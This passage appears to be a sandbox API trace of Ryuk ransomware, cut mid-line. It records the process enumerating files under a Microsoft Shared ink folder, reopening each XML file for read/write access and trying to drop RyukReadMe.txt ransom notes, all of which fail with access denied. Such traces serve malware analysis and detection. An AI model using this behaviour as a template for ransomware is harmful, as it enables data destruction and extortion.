(lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.584] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", dwFileAttributes=0x80) returned 0 [0131.585] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.585] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.585] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.585] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0131.585] FindClose (in: hFindFile=0x3bb540 | out: hFindFile=0x3bb540) returned 1 [0131.585] SetLastError (dwErrCode=0x0) [0131.585] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.585] GetLastError () returned 0x5 [0131.585] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.585] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.585] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.585] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.586] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml", dwFileAttributes=0x80) returned 0 [0131.586] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.586] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.586] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.587] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.587] SetLastError (dwErrCode=0x0) [0131.587] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.587] GetLastError () returned 0x5 [0131.587] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.587] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.587] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3bb540 [0131.587] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.587] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.587] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.587] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml", dwFileAttributes=0x80) returned 0 [0131.587] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.588] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.588] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.588] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.588] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.588] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", dwFileAttributes=0x80) returned 0 [0131.591] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.591] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.591] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.591] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.591] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.592] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", dwFileAttributes=0x80) returned 0 [0131.592] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.592] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.592] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.592] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0131.592] FindClose (in: hFindFile=0x3bb540 | out: hFindFile=0x3bb540) returned 1 [0131.592] SetLastError (dwErrCode=0x0) [0131.592] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.592] GetLastError () returned 0x5 [0131.592] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.592] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.592] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.592] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.593] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml", dwFileAttributes=0x80) returned 0 [0131.593] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.593] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.593] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.594] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.594] SetLastError (dwErrCode=0x0) [0131.594] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.594] GetLastError () returned 0x5 [0131.594] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.594] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.594] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3bb540 [0131.595] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.595] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.595] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.595] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml", dwFileAttributes=0x80) returned 0 [0131.596] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.596] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.596] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.596] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.596] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.597] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", dwFileAttributes=0x80) returned 0 [0131.597] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.597] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.597] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.597] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.597] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.597] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml", dwFileAttributes=0x80) returned 0 [0131.598] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.598] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.598] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.598] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.599] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.599] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml", dwFileAttributes=0x80) returned 0 [0131.599] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.599] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.599] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.599] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.599] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.599] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml", dwFileAttributes=0x80) returned 0 [0131.600] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.600] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.600] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.600] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.600] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.601] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml", dwFileAttributes=0x80) returned 0 [0131.601] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.601] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.601] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.601] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.601] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.601] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml", dwFileAttributes=0x80) returned 0 [0131.602] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.602] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.602] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.602] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.602] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.602] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml", dwFileAttributes=0x80) returned 0 [0131.602] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.603] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.603] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.603] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.603] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.603] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml", dwFileAttributes=0x80) returned 0 [0131.604] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.604] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.604] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.604] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.604] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.604] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml", dwFileAttributes=0x80) returned 0 [0131.604] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.604] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.604] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.604] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.604] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.605] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", dwFileAttributes=0x80) returned 0 [0131.605] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.605] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.605] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.605] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.605] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.606] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", dwFileAttributes=0x80) returned 0 [0131.606] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.606] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.606] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.606] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.606] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.606] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", dwFileAttributes=0x80) returned 0 [0131.613] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.613] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.613] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.613] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0131.613] FindClose (in: hFindFile=0x3bb540 | out: hFindFile=0x3bb540) returned 1 [0131.614] SetLastError (dwErrCode=0x0) [0131.614] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.618] GetLastError () returned 0x5 [0131.618] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.618] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.618] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.618] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.618] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", dwFileAttributes=0x80) returned 0 [0131.619] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.620] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.620] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.620] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.620] SetLastError (dwErrCode=0x0) [0131.620] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.621] GetLastError () returned 0x5 [0131.621] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.621] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.621] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3bb540 [0131.621] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.621] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.621] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.621] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml", dwFileAttributes=0x80) returned 0 [0131.621] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers\\numbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.621] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.621] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.621] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0131.621] FindClose (in: hFindFile=0x3bb540 | out: hFindFile=0x3bb540) returned 1 [0131.622] SetLastError (dwErrCode=0x0) [0131.622] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 